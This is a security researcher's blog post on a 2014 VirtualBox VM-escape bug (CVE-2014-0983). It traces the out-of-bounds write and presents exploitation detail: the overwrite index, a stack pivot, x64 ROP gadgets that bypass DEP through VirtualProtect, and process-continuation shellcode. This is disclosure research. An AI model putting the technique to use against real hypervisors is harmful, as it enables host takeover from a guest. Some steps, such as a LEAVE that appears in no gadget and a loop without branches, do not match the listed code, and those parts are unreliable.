VUPEN Vulnerability Research Team (VRT) Blog

Advanced Exploitation of VirtualBox 3D Acceleration VM Escape Vulnerability (CVE-2014-0983)
Published on 2014-07-25 18:21:38 UTC by Florian Ledoux, Security Researcher @ VUPEN

Hi everyone,

In a previous blog post, we shared our exploitation technique for a critical guest-to-host escape vulnerability affecting the Xen hypervisor. In this new post we focus on another VM escape vulnerability, this time affecting VirtualBox.

A few months ago, our friends from Core Security released an advisory for multiple memory corruption vulnerabilities affecting VirtualBox, which could allow a user or program within a guest OS to escape the virtual machine and execute arbitrary code on the host OS.

A few weeks ago, during REcon 2014, Francisco Falcon demonstrated that these vulnerabilities could be combined and exploited to achieve a guest-to-host escape on a 32-bit Windows host.

In this blog post, we share our exploitation technique to achieve a reliable VM escape on a 64-bit Windows 8 host using just one vulnerability (CVE-2014-0983), and without crashing the VirtualBox process (aka process continuation).

1. Technical Analysis of the Vulnerability

Multiple memory corruption vulnerabilities exist in the VirtualBox 3D acceleration for OpenGL graphics. In this analysis we will focus on CVE-2014-0983.

From the guest OS point of view, the guest additions run multiple services such as drag and drop, shared clipboard, graphics rendering, etc. One of these services is called "SharedOpenGL". It provides remote rendering of OpenGL graphics through a client/server model when 3D Acceleration is enabled in VirtualBox (it is disabled by default). The guest OS acts as a client and sends render messages to the "VBoxGuest.sys" driver. This driver then forwards the messages through PMIO/MMIO to the host (acting as a server), which parses them. More details about VirtualBox and 3D are available

There are many render message types, one of which is "CR_MESSAGE_OPCODES". Its structure is composed of opcodes (command IDs) followed by data. The "crUnpack()" function handles all opcodes on the server side (host OS):

 static void
 crServerDispatchMessage(CRConnection *conn, CRMessage *msg)
 {
     const CRMessageOpcodes *msg_opcodes;
     /* ... */
     CRASSERT(msg->header.type == CR_MESSAGE_OPCODES);

     msg_opcodes = (const CRMessageOpcodes *)msg;
     data_ptr = (const char *) msg_opcodes + sizeof(CRMessageOpcodes) + opcodeBytes;
     crUnpack(data_ptr,                  /* first command operands */
              data_ptr - 1,              /* first command opcode */
              msg_opcodes->numOpcodes,   /* how many opcodes */
              &(cr_server.dispatch));    /* the CR dispatch table */
     /* ... */
 }

The body of the "crUnpack()" function is generated automatically at build time by a Python script located at "src/VBox/HostServices/SharedOpenGL/unpacker/unpack.py". This function acts as a switch that dispatches to a different function for each opcode being processed.

When the host receives a message containing opcode "CR_VERTEXATTRIB4NUBARB_OPCODE" (0xEA), "crUnpack()" calls "crUnpackVertexAttrib4NubARB()". This function parses the render message received from the guest OS without any validation or check:

 static void crUnpackVertexAttrib4NubARB(void)
 {
     GLuint index = READ_DATA( 0, GLuint );
     GLubyte x = READ_DATA( 4, GLubyte );
     GLubyte y = READ_DATA( 5, GLubyte );
     GLubyte z = READ_DATA( 6, GLubyte );
     GLubyte w = READ_DATA( 7, GLubyte );
     cr_unpackDispatch.VertexAttrib4NubARB( index, x, y, z, w );
     INCR_DATA_PTR( 8 );
 }

 void SERVER_DISPATCH_APIENTRY crServerDispatchVertexAttrib4NubARB(GLuint index, GLubyte x, GLubyte y, GLubyte z, GLubyte w )
 {
     cr_server.head_spu->dispatch_table.VertexAttrib4NubARB(index, x, y, z, w );
     cr_server.current.c.vertexAttrib.ub4[index] = cr_unpackData;
 }

Due to the lack of validation of the array index, memory located after the "cr_server.current.c.vertexAttrib.ub4" array can be corrupted by "cr_unpackData".

 .text:000007FA24376440 crServerDispatchVertexAttrib4NubARB proc near
 .text:000007FA24376440 var_18 = byte ptr -18h
 .text:000007FA24376440 arg_20 = byte ptr 28h
 .text:000007FA24376440 push rbx
 .text:000007FA24376442 sub rsp, 30h
 .text:000007FA24376446 movzx eax, [rsp+38h+arg_20]
 .text:000007FA2437644B mov ebx, ecx ; index
 .text:000007FA2437644D mov [rsp+38h+var_18], al
 .text:000007FA24376451 mov rax, cs:head_spu
  // dispatch_table.VertexAttrib4NubARB
 .text:000007FA24376458 call qword ptr [rax+1498h]
  // pointer to controlled opcode data
 .text:000007FA2437645E mov rax, cs:cr_unpackData
 .text:000007FA24376465 lea rcx, cr_server_current_c_vertexAttrib_ub4
 .text:000007FA2437646C mov [rcx+rbx*8], rax ; crash
 .text:000007FA24376470 add rsp, 30h
 .text:000007FA24376474 pop rbx
 .text:000007FA24376475 retn
 .text:000007FA24376475 crServerDispatchVertexAttrib4NubARB endp

This could be exploited by a malicious user or program in a guest OS to execute arbitrary code on the host OS.
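
For contrast, here is a minimal sketch of the kind of index validation that the vulnerable function lacks. It is not the vendor's actual fix: the array size "SKETCH_MAX_VERTEX_ATTRIBS", the stand-in array "sketch_ub4" and the function "sketch_store_attrib()" are hypothetical names introduced only for illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical array size; the real limit is defined by the VirtualBox sources. */
#define SKETCH_MAX_VERTEX_ATTRIBS 16u

/* Stand-in for the cr_server.current.c.vertexAttrib.ub4 array. */
static const void *sketch_ub4[SKETCH_MAX_VERTEX_ATTRIBS];

/* Store ptr at sketch_ub4[index] only when index lies inside the array.
 * Returns true if the store happened, false if the index was rejected. */
static bool sketch_store_attrib(uint32_t index, const void *ptr)
{
    if (index >= SKETCH_MAX_VERTEX_ATTRIBS) {
        return false;   /* guest-supplied index out of range: ignore the command */
    }
    sketch_ub4[index] = ptr;
    return true;
}
```

With a check of this kind, an index such as 0x2A9 would be rejected before the store instead of writing past the end of the array.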

2. Exploitation on Windows 8 (64bit) Host

To exploit this vulnerability from a guest VM, we need to write and use a malicious program to send the malformed message to the host through available guest addition drivers.

The vulnerable function "crUnpackVertexAttrib4NubARB" is located in "VBoxSharedCrOpenGL.dll" while the array is located in the .data section:

 .data:000007FA2444B518 cr_server_current_c_vertexAttrib_ub4 db ?

Thus, memory following the "cr_server.current.c.vertexAttrib.ub4" array can be overwritten with "cr_unpackData", which is a pointer to the render message sent from the guest OS.

Memory of "VBoxSharedCrOpenGL.dll" in the host OS can then be corrupted relative to the "cr_server.current.c.vertexAttrib.ub4" array. With this write primitive we can, for example, corrupt a function pointer located in the .data section. By looking at the vulnerable function, we can see:

 cr_server.head_spu->dispatch_table.VertexAttrib4NubARB(index, x, y, z, w );

This translates into the following assembly:

 .text:000007FA24376451 mov rax, cs:head_spu
 // dispatch_table.VertexAttrib4NubARB
 .text:000007FA24376458 call qword ptr [rax+1498h]

Where "cr_server.head_spu" lands in the .data section:

 .data:000007FA2444CA60 head_spu dq

This is the address to be corrupted. "cr_server.head_spu" is located right after the array, so a positive index is needed for our corruption:

 .text:000007FA2437646C mov [rcx+rbx*8], rax                              // corruption
 .data:000007FA2444B518 cr_server_current_c_vertexAttrib_ub4 db // array
 .data:000007FA2444CA60 cr_server_head_spu dq                          // target

Index can be calculated as follows:

 0x7FA2444CA60 - 0x7FA2444B518 = 0x1548
 0x1548 / 8 = 0x2A9
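
The same arithmetic can be written as a small C helper, as a sketch for checking the numbers above. The function name "slot_index()" is hypothetical; the 8-byte slot size comes from the "mov [rcx+rbx*8], rax" instruction, and the two addresses are the ones shown in the listing.

```c
#include <stdint.h>

/* Element index such that array_base + index * 8 == target.
 * Assumes target >= array_base and that the distance is a multiple of 8. */
static uint64_t slot_index(uint64_t array_base, uint64_t target)
{
    return (target - array_base) / sizeof(uint64_t);
}
```

Calling slot_index(0x7FA2444B518, 0x7FA2444CA60) yields 0x2A9, which matches the value computed by hand.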

Once "cr_server.head_spu" has been corrupted, the host has already finished parsing our render message, so the execution flow is not redirected yet. However, when the same message containing opcode "CR_VERTEXATTRIB4NUBARB_OPCODE" (0xEA) is sent again, "cr_server.head_spu" is dereferenced again in:

 .text:000007FA24371E30 push rbx
 .text:000007FA24371E32 sub rsp, 20h
 .text:000007FA24371E36 mov ebx, ecx
 .text:000007FA24371E38 call crStateBegin
 .text:000007FA24371E3D mov rax, cs:head_spu
 .text:000007FA24371E44 mov ecx, ebx
 .text:000007FA24371E46 add rsp, 20h
 .text:000007FA24371E4A pop rbx
 .text:000007FA24371E4B jmp qword ptr [rax+0B0h]

Since "cr_server.head_spu" has been corrupted by "cr_unpackData" (referring to our controlled data), the jump instruction relative to rax+0xB0 will redirect the execution flow.

The next step is to pivot the stack. By default, VirtualBox has ASLR/DEP enabled for all components except "VBoxREM.dll", which does not opt in to ASLR, so we can take advantage of it during exploitation (of course, it is also possible to exploit another vulnerability to obtain a memory leak).

Here is the state of all registers when we redirect the execution flow:

 rax=000000004b09f2b4 rbx=000000004b09f2b0 rcx=0000000000000331
 rdx=0000000000000073 rsi=0000000000000001 rdi=000007fa2444ca68
 rip=000007fa24371e4b rsp=00000000055afb78 rbp=000000004b09f2a6
 r8=7efefefefefefeff r9=7efefefefefeff72 r10=0000000000000000
 r11=8101010101010100 r12=0000000000000004 r13=000007fa24360000
 r14=000007fa1d7b0000 r15=000000004aa16a50
 iopl=0 nv up ei pl nz na pe nc
 cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
 000007fa' 24371e4b 48ffa0b0000000 jmp qword ptr [rax+0B0h]

Registers RAX, RBX and RBP point to the render message:

 0:015> dd rax
 00000000' 4b09f2b4 000002a9 42424242 42424242 42424242
 0:015> dd rbx
 00000000' 4b09f2b0 00000331 000002a9 42424242 42424242
 0:015> dd rbp
 00000000' 4b09f2a6 0008f702 00300000 03310000 02a90000
 00000000' 4b09f2b6 42420000 42424242 42424242 42424242

They contain the rendering opcode, followed by our fully controlled data.

Our stack pivot cannot simply end with a RET, JMP [register], or CALL [register] instruction. However, x64 compilers can optimize the last call made from a function by replacing it with a jump to the callee. This helps us find a suitable pivot such as this one:

 ; Gadget 1: 6a689670
 mov rax,qword ptr [rdx+rax] ds:00000000' 4b09f327=000000006a6810db
 add rsp,28h
 mov rdx,rbx
 pop rbx
 jmp rax

RDX register is always set to 0x73. Hence, the first instruction will move controlled data to RAX.

LEAVE instruction will set RSP to RBP value (which points to our message as well). Then we jump to RAX register (our next gadget).

Now that RSP is controlled, an x64 ROP chain can be used to call "VirtualProtect()" and achieve code execution. Without going into the details of each gadget, the first one lifts the stack (POP RSI, RDI, RBP, R12). The following gadgets are then used:

 ; Gadget 2: control RDX value
 pop rdx
 xor ecx,dword ptr [rax]
 add cl,cl
 movzx eax,al

 ; Gadget 3: set RAX to RSP value
 lea rax,[rsp+8]

 ; Gadget 4: set RAX to RSP + RDX (offset)
 lea rax,[rdx+rax]

 ; Gadget 5: Write stack address (EAX) on the stack (with index RDX)
 add dword ptr [rax],eax
 add cl,cl

With those gadgets, RSP value can be written anywhere on the stack (depending on RDX value). Now that the stack is controlled, the following gadget will be used to call "VirtualProtect()" and bypass DEP:

 ; Gadget 6
 mov r9,r12
 mov r8d,dword ptr [rsp+8Ch]
 mov rdx,qword ptr [rsp+68h]
 mov rcx,qword ptr [rsp+50h]
 call rbp

Thanks to the second gadget (stack lifting) we control R12 and RBP.

(Note: Unlike x86, on x64 systems the first four function parameters are not pushed on the stack. They are passed in registers RCX, RDX, R8, and R9 instead.)

Now the stack contains controlled data and we are able to write RSP value into it. Therefore all function parameters can be setup. Finally "VirtualProtect()" is called by setting RBP to 0x6a70bb20:
 .text:000000006A70BB20 jmp cs:VirtualProtect

Unlike on x86, on x64 the RBP register is generally not used to access parameters and local variables on the stack. It is not a frame pointer anymore.
 ; .text: 0x6a709292
 call rbp (0x6a70bb20)

 ; .text: 0x6A70BB20
 jmp cs:VirtualProtect

 ; KERNEL32!VirtualProtectStub
 jmp qword ptr [KERNEL32!_imp_VirtualProtect (000007fa' 2ccce2e8)]

 ; KERNELBASE!VirtualProtect
 mov rax,rsp

"VirtualProtect()" is then executed and stack permissions are set to RWE. The last gadgets will redirect the execution flow:
 ; Gadget 7
 lea rax, [rsp+8]

 ; Gadget 8
 push rax
 adc cl,ch

Now our data sent from the guest OS is executed in the host OS's context despite exploit mitigations in place.

Shellcode and Process Continuation

The aim now is to execute our x64 shellcode without crashing the VirtualBox process (aka process continuation).

The first instruction executed is quite sensitive because RSP (stack pointer) points almost to the same location as RIP (instruction pointer). RSP therefore has to be moved somewhere else, to the end of our rendering message.

The 3D rendering message is allocated on the guest OS and its components are known (opcodes, ROP, pre-shellcode, shellcode, post-shellcode, shellcode stack size). Hence we are able to craft this message according to the shellcode and the stack size needed.

Pre-shellcode to be used:

 4ab9a30e 90 nop
 4ab9a30f 90 nop
 4ab9a310 4881c4XXXXXXXX add rsp,X

Now that the stack pointer is at a safe location, our shellcode can be executed. Our post-shellcode then runs to repair:

- Stack pointer (RSP)
- Corrupted function pointer in the .data section (cr_server.head_spu)

To retrieve the original stack pointer, Thread Environment Block (TEB) is used. This structure can be accessed thanks to the GS register. TEB starts with a structure which contains everything we need:

 typedef struct _NT_TIB {
     /* ... */
     PVOID StackBase;
     PVOID StackLimit;
     /* ... */
 } NT_TIB;
Once the stack base is found, pattern matching can be used to locate the original stack pointer:
 mov eax,dword ptr gs:[10h]            // retrieve stack base
 xor rbx,rbx
 Label1:                               // pattern matching
 inc rbx
 cmp dword ptr [rax+rbx*4],331h        // opcode argument
 inc rbx
 cmp dword ptr [rax+rbx*4],2A9h        // index used for corruption
 inc rbx
 cmp dword ptr [rax+rbx*4],42424242h   // Heh ;)
 lea rax,[rax+rbx*4]                   // retrieved RSP
 add rax,270h                          // skip embarrassing functions
 mov rsp,rax

0x270 (0x170 + 0x100) is added to the stack pointer that was found: 0x170 brings us back to the call stack state we had before the code flow redirection, and a further 0x100 bytes are skipped to avoid the message parsing functions (frames 01 to 04 below):

 #  Memory  Call Site
 01      8  VBoxSharedCrOpenGL!crUnpack+0xc8
 02     70  crServerVBoxCompositionSetEnableStateGlobal+0xdbca
 03     30  crServerVBoxCompositionSetEnableStateGlobal+0xdd59
 04     30  crServerServiceClients+0x18

 05     30  crVBoxServerRemoveClient+0x18b
 06     30  VBoxSharedCrOpenGL+0x19cb
 07     60  VBoxC!VBoxDriversRegister+0x46002
 08     70  VBoxC!VBoxDriversRegister+0x442dc
 09     30  VBoxRT!RTThreadFromNative+0x20f

With a RET instruction, execution can resume its original flow. But before that, "cr_server.head_spu" has to be repaired.

"cr_server.head_spu" was corrupted by the exploit. The default value of this variable is a heap address containing a virtual function table. Retrieving the original heap address is not easy because:

- Each Windows version has a different and complex heap format
- Pattern matching is not possible, since the heap content is a function table

A simple solution is to reuse existing code. Note that "crVBoxServerRemoveClient()" of "VBoxSharedCrOpenGL.dll" is located on top of the stack. Its address is located at the beginning of the .text section. Each library mapped in memory is aligned, so if we keep only the high part of the function address we can obtain "VBoxSharedCrOpenGL" base.

 mov rsp,rax
 // take VBoxSharedCrOpenGL!crVBoxServerRemoveClient+0x18b
 mov rax,qword ptr [rax]
 and rax,0FFFFFFFFFFFF0000h     // get VBoxSharedCrOpenGL.dll base
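
The masking step can be expressed in C as rounding an address down to a 64 KiB boundary. This is a sketch only: the names "SKETCH_ALLOC_GRANULARITY" and "align_down_64k()" are hypothetical, and the sample address used in the note below is made up for illustration.

```c
#include <stdint.h>

/* 64 KiB alignment, matching the 0FFFFFFFFFFFF0000h mask used above. */
#define SKETCH_ALLOC_GRANULARITY 0x10000ULL

/* Clear the low 16 bits of addr, i.e. round it down to a 64 KiB boundary. */
static uint64_t align_down_64k(uint64_t addr)
{
    return addr & ~(SKETCH_ALLOC_GRANULARITY - 1);
}
```

For instance, align_down_64k(0x7FA24361234) gives 0x7FA24360000. The result equals the module base only when the input address lies within the first 64 KiB of the module, which is why it matters that the function sits at the beginning of the .text section.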

Knowing the "VBoxSharedCrOpenGL" base, our post-shellcode routine can call other functions such as "crVBoxServerInit()". This function calls "crServerSetVBoxConfigurationHGCM()", which repairs "cr_server.head_spu".

 GLboolean crVBoxServerInit(void)
 {
     /* ... */

     if (!cr_server.head_spu)
         return GL_FALSE;

     crStateDiffAPI( &(cr_server.head_spu->dispatch_table) );

     return GL_TRUE;
 }

 void crServerSetVBoxConfigurationHGCM()
 {
     int spu_ids[1] = {0};
     char *spu_names[1] = {"render"};
     char *spu_dir = NULL;

     cr_server.head_spu = crSPULoadChain(1, spu_ids, spu_names, spu_dir, &cr_server);
     /* ... */
 }


And then comes the last part of our post-shellcode:

 mov rsp,rax
 // take VBoxSharedCrOpenGL!crVBoxServerRemoveClient+0x18b
 mov rax,qword ptr [rax]
 and rax,0FFFFFFFFFFFF0000h // get VBoxSharedCrOpenGL.dll base
 push rax
 add rax,4630h                    // get VBoxSharedCrOpenGL!crVBoxServerInit
 call rax                              // auto-repair
 pop rax
 ret                                    // return to the original call stack

This leads to a reliable guest-to-host escape and arbitrary code execution on the 64-bit host OS without crashing VirtualBox.

Copyright VUPEN Security

